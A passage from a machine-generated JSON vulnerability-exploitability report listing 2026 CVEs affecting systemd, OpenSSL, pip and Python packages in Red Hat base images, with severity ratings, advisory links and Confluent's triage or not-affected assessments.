          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-31789",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 9.8,
          "severity": "critical",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 9.8,
          "severity": "critical",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "critical"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.8,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        787
      ],
      "description": "Issue summary: Converting an excessively large OCTET STRING value to\na hexadecimal string leads to a heap buffer overflow on 32 bit platforms.\n\nImpact summary: A heap buffer overflow may lead to a crash or possibly\nan attacker controlled code execution or other undefined behavior.\n\nIf an attacker can supply a crafted X.509 certificate with an excessively\nlarge OCTET STRING value in extensions such as the Subject Key Identifier\n(SKID) or Authority Key Identifier (AKID) which are being converted to hex,\nthe size of the buffer needed for the result is calculated as multiplication\nof the input length by 3. On 32 bit platforms, this multiplication may overflow\nresulting in the allocation of a smaller buffer and a heap buffer overflow.\n\nApplications and services that print or log contents of untrusted X.509\ncertificates are vulnerable to this issue. As the certificates would have\nto have sizes of over 1 Gigabyte, printing or logging such certificates\nis a fairly unlikely operation and only 32 bit platforms are affected,\nthis issue was assigned Low severity.\n\nThe FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this\nissue, as the affected code is outside the OpenSSL FIPS module boundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-31789"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-31789"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-032379.html"
        },
        {
          "url": "https://github.com/advisories/GHSA-j79m-9jxq-788r"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/364f095b80601db632b0def6a33316967f863bde"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/7a9087efd769f362ad9c0e30c7baaa6bbfa65ecf"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/945b935ac66cc7f1a41f1b849c7c25adb5351f49"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/a24216018e1ede8ff01a4ff5afff7dfbd443e2f9"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/a91e537d16d74050dbde50bb0dfb1fe9930f0521"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31789"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260407.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8155-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-31789"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/04/07/11"
        }
      ],
      "published": "2026-04-07T22:16:21+00:00",
      "updated": "2026-07-24T23:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-3219",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
      },
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N"
        }
      ],
      "cwes": [
        434
      ],
      "description": "pip handles concatenated tar and ZIP files as ZIP files regardless of filename or whether a file is both a tar and ZIP file. This behavior could result in confusing installation behavior, such as installing \"incorrect\" files according to the filename of the archive. New behavior only proceeds with installation if the file identifies uniquely as a ZIP or tar archive, not as both.",
      "recommendation": "Upgrade pip to version 26.1",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-3219"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/20/8"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-3219"
        },
        {
          "url": "https://github.com/pypa/pip"
        },
        {
          "url": "https://github.com/pypa/pip/issues/13867"
        },
        {
          "url": "https://github.com/pypa/pip/pull/13870"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/QAJ5JIVWWCAJ4EZL2FP5MOOW35JS7LRJ"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/QAJ5JIVWWCAJ4EZL2FP5MOOW35JS7LRJ/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3219"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-3219"
        }
      ],
      "published": "2026-04-20T16:16:45+00:00",
      "updated": "2026-06-17T10:43:14+00:00",
      "affects": [
        {
          "ref": "pkg:pypi/pip@26.0.1",
          "versions": [
            {
              "version": "26.0.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:pypi/pip@26.0.1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-3276",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        407
      ],
      "description": "unicodedata.normalize() can take excessive CPU time when processing\nspecially crafted Unicode input containing long runs of combining characters\nwith alternating Canonical Combining Class values.\nThis affects all normalization forms.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-3276"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/06/03/15"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-3276"
        },
        {
          "url": "https://github.com/python/cpython/commit/6b505d1f41f8f3ea0fe5a4786d3a8fff1875cfc0"
        },
        {
          "url": "https://github.com/python/cpython/commit/90748760d38ca3ac5fc6788a69becab905c95598"
        },
        {
          "url": "https://github.com/python/cpython/commit/991224b1e8311c85f198f6dd8208bf8cff7fc26f"
        },
        {
          "url": "https://github.com/python/cpython/commit/ba785b88add96acbf403d65cb157fb2743a33a32"
        },
        {
          "url": "https://github.com/python/cpython/commit/c5512bd7c1dc28055660565275012766941d3066"
        },
        {
          "url": "https://github.com/python/cpython/commit/d3ab945af25b28dfe13ac6cb40c124a01b33ce1f"
        },
        {
          "url": "https://github.com/python/cpython/commit/db744c0776c1d5dd11aaa70eff2a6993c408bacc"
        },
        {
          "url": "https://github.com/python/cpython/commit/e322a1857084d521f79f45181b776f62e6acfc2c"
        },
        {
          "url": "https://github.com/python/cpython/issues/149079"
        },
        {
          "url": "https://github.com/python/cpython/pull/149080"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/PP5HB4K7727OBBM76KA2ILID76K3OZGZ/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3276"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8509-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-3276"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/06/03/15"
        }
      ],
      "published": "2026-06-03T16:16:29+00:00",
      "updated": "2026-08-13T01:16:52+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
